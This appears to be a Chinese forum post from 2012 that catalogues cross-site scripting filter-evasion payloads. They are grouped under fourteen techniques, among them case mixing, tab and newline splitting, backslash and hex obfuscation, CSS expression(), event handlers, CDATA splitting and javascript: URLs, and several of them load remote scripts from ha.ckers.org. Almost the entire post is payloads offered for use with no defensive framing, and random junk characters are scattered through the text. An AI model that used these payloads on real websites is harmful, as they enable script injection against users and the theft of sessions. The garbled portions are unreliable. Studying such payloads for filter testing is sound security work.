1. 改变字符大小写* |' r& ^/ h; F$ e6 t& W" e0 ^7 E4 H0 Z
6 V- Q3 Y: q' y2 t
0 c$ Q0 V+ @; c6 C' ]
+ @+ ^0 G( X; ]" v <sCript>alert(‘d’)</scRipT>
+ a1 Z/ I- m% Y
7 B% |% i" h* L+ q% T7 M, d6 N2. 利用多加一些其它字符来规避Regular Expression的检查7 G" C5 Z* J7 r4 p) v; \
0 N' u7 `) U- x5 d0 r <<script>alert(‘c’)//<</script>
; K2 ~. y" c3 s' J$ ?# m8 | O
' K w9 A, D- ? <SCRIPT a=">" SRC="t.js"></SCRIPT>+ j& ~( ~; n. k5 e/ Y' X6 J
* J- e$ U9 r5 a8 ^
<SCRIPT =">" SRC="t.js"></SCRIPT>
: G) h/ |5 ^1 f8 q
" v- x3 r/ a* d3 p' {& e2 \. c) o <SCRIPT a=">" ” SRC="t.js"></SCRIPT>5 T8 d. Q# @& z* `9 r
6 C5 N; e. b+ l; ?' q0 r* _- l <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>$ J: C. j& G4 ^) Q( l
, V4 u: o% L( P: q6 N <SCRIPT a=`>` SRC="t.js"></SCRIPT>
( z4 T/ k( E f! K, d# {. c$ E! V% j8 b/ ^5 p
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>( @3 f8 y, ^/ ^& p8 x! ]
6 q. X4 S5 P' O# y3. 以其它扩展名取代.js+ ?3 A5 p6 |" B$ w& P ]9 M$ g$ u
( x Z$ R6 K2 U& R9 W5 n+ J, n <script src="bad.jpg"></script>, j" C/ L* ~ _, _
$ S0 n; j T% x$ B% }4 j0 ^$ _4. 将Javascript写在CSS档里1 _" m5 j( K: A% @7 G) }/ k0 o
y# p5 \/ H8 ]; V% V: l <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
2 w# ~6 G$ c+ q4 l) ?( {5 L' Q- J* [( i+ g. O' k9 |
example:
; Y3 Z, F' B. r. H/ j" ~' I
' e; H! k* E; D+ P/ W! C4 G body {
! b1 C5 u$ ^0 a1 u/ `8 ?) P, Y9 u- D1 }3 ]6 P" v/ M g
background-image: url(‘javascript:alert("XSS");’)
- X7 {( K1 G6 G
* ~+ N+ B! H9 g. u2 e }
% |& o/ z2 ~& J1 ^' ^+ q: a0 m8 M& C1 |
5. 在script的tag里加入一些其它字符4 y% G5 K" S# j; b
8 q+ H' |3 g- O9 d
<SCRIPT/SRC="t.js"></SCRIPT>: k. @5 |) [, W! ~
5 L) X" t/ J% T' f; b <SCRIPT/anyword SRC="t.js"></SCRIPT>$ D Q& Y% |! U9 S6 x
) t% s/ A& t' K7 d) V
6. 使用tab或是new line来规避
( L0 m4 q0 V$ G. Q5 e
6 |3 D% H v# k <img src="jav ascr ipt:alert(‘XSS3′)">
8 D. n Z P/ ]) |, q" ` H
+ U) K- w' ^7 _0 \8 g <img src="jav ascr ipt:alert(‘XSS3′)">
, r5 W; q% l$ q7 |' B2 L' z
, E$ g% M, v$ G e9 N* i% L, @ <IMG SRC="jav ascript:alert(‘XSS’);">
) t& l# e: _5 L2 T9 C& X: S( M+ T/ s$ e
-> tag
R w0 D2 |* o- p$ P5 g( v: w
( k: f. f% v* F4 P1 ] -> new line) M" e) n2 X1 o/ C* T( Z: l
: z% a+ J; p& _1 H3 P" v5 ?4 Y7. 使用"\"来规避
1 ?+ g' {% x% @- E3 U1 l
: V( u3 A; j; X# D$ G" F0 D <STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>' L4 p7 c* {6 m& i5 h
% r8 j% C" x2 X
<IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>2 W( E5 D$ J8 ]
j" m# l& k/ c8 _9 a* o' q
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">7 G( d4 |) @ f( P* T$ l4 n" d( B
2 N* f! d% H3 V, {8 e0 `
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">& ] C* U5 \$ J) H% L
3 K* x% S _) o3 o( K& m$ R* {, F <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
; _6 @1 h7 ~6 F$ Y2 b+ q1 V9 \
, @1 y R, H; m7 J5 \8. 使用Hex encode来规避(也可能会把";"拿掉)0 D7 Q( j9 w+ \3 L
4 m; _5 {* m, O/ S5 b <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
1 g {0 i3 p0 C3 f! K1 h
, b+ X V: D2 X r2 J4 J3 B7 [ 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
; @5 T8 N1 V* J1 D
9 G0 P4 k& Y. G8 M: m. A* U <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">. v: t' D; {: A
# T6 z, v$ y4 x% G7 V, g, f) c
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
: `5 g! `, B6 ^1 x# k9 D5 t) f) V" D6 m' l/ j4 W
9. script in HTML tag% N1 s/ ?( a }1 q3 ]/ s( P( n
A$ w4 Q- [3 `! H4 D- g <body onload=」alert(‘onload’)」>
7 T, ?, k2 l/ {2 S* \4 l9 ?) c8 G7 {: J$ L; I
onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload: P1 x8 |2 M& \3 t) C
+ M; @0 u/ L, j4 |: Q# g
10. 在swf里含有xss的code
! T# A2 \) k0 Z, K1 i; \2 F! ?. O5 W1 _" d0 P3 }' ^: T
<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
, D3 a' e+ m2 f9 j$ M$ E3 q$ D( K! k* g; ~- i2 f0 D
11. 利用CDATA将xss的code拆开,再组合起来。
0 |( X. M% J) } J- `
/ E* |7 g" a' r) ]; H0 U: y/ B <XML ID=I><X><C>( D1 Z2 Q3 s2 k4 Y6 O
! x. C9 |! \; E; a& Q8 V
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>/ w. k% N/ p+ }" o/ g' y
$ y, v$ g- Z6 x8 o- Y4 [$ M; r# R </C></X>
" ^* b# R+ v, E0 o9 O* M h
' ?% F9 Q& ?1 L! y) Q </xml>. p. w0 t( K: ]5 i0 H. m
/ O& w7 e8 t: ~+ i' y j5 |; r" m) r
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
2 P5 Y/ N- L4 Y) P5 [! T3 p( l& `6 U
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>- v$ y& |2 A, n; O
8 P! P4 J$ }7 D
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>+ b+ [' Z, k( a6 _+ i. }' N, R) z
% l$ }. I% W" M" R: E3 u12. 利用HTML+TIME。
9 ?7 q4 o5 @* v* [ u! {5 _ H2 T7 N1 @. E
<HTML><BODY>$ G$ P2 k% k/ i
1 C. P- A- y, R0 _) V- [ _3 Q <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
1 X0 A) T& K. z6 e) Y! P* V( D3 O3 ?
<?import namespace="t" implementation="#default#time2">
0 D0 i8 i' U8 P8 v( }
4 y& V# c" E+ E2 u3 i <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">1 J: C) F% w5 M: R/ v0 G
0 H. A$ d+ c( Y
</BODY></HTML>5 j. }7 t' @/ a, Z- H
9 q" W) z& c; R) h6 d% W, g13. 透过META写入Cookie。
: O" S% [, ~2 ?6 A7 y- T, Y8 @
) W+ B" s, A: f) M/ T, u! s <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">
b6 q0 u. `/ S1 G2 W3 r$ B2 b( L
H2 N R' z5 ^& C) U0 r14. javascript in src , href , url
# Z$ d) {. q& R
/ m& o, d4 z- H8 O <IFRAME SRC=javascript:alert(’13′)></IFRAME>
0 }1 e/ d2 h7 w: w0 ?' c
; w; y; M" v+ y1 p4 X7 K7 ^ <img src="javascript:alert(‘XSS3′)">2 j3 X; S2 r: Q7 M8 ^* B6 Y; P, m
: V! b% @) F4 q% p. f5 r8 v<IMG DYNSRC="javascript:alert(‘XSS20′)">" G- i. I- n% t U% l s- V
# D ]; X. h/ |. Q$ O0 a! i0 E
<IMG LOWSRC="javascript:alert(‘XSS21′)">
0 k' ]( X0 c" d: |; F1 ]2 ]; ~: P$ l7 n4 R1 c0 g
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
4 _% D: T. q0 k. d
8 d. i9 z1 c* e( U0 ? <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
$ e/ M5 T: q% H1 [
* M7 c ^- f% n: W% u6 @ <TABLE BACKGROUND="javascript:alert(‘XSS29′)">% X$ c, q1 }; q i5 r
& W ~2 y4 O6 t& r. @0 \5 v' s2 r
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))"> ~0 u1 x$ g# b5 A4 ~
% X& n% d5 {4 ~5 \+ M3 H: A3 {
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}5 C: V/ e) @! ~. r( [% I
" l* c. i' p7 M3 R# T1 G/ [
</STYLE><A CLASS=XSS></A>% F2 q4 |3 d, @. ]3 C0 K
& O( R0 Y1 L9 Q% z
<FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
! Z7 e% g1 P; x4 u# Z8 g6 P$ n1 J
1 j4 E- H9 |! E C |
发表于 2012-12-31 09:59:28
收藏
支持
反对